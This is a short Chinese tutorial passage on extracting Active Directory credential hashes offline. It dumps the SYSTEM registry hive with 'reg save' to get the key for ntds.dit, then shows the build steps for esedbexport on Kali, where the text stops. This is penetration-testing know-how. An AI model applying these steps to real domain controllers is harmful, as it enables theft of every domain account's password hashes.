离线方式读取ntds.dit文件
离线一般需要两步:
1、将远端域控的ntds.dit下载到本地,
2、然后利用再在本地进行。
注意:因为 system.hive 里存放着 ntds.dit 的秘钥,所以需要转储 system.hive ,不然没法查看 ntds.dit 里内容
命令如下:
reg save hklm\system c:\windows\temp\system.hive
下面介绍几种方式离线读取ntds.dit文件
esedbexport
1、以kali为例子,安装esedbexport
apt-get install autoconf automake autopoint libtool pkg-config
wget https://github.com/libyal/libesedb/releases/版本
tar zxvf libesedb-experimental-20210424.tar.gz
cd libesedb-20210424
./configure
make
make install
ldconfig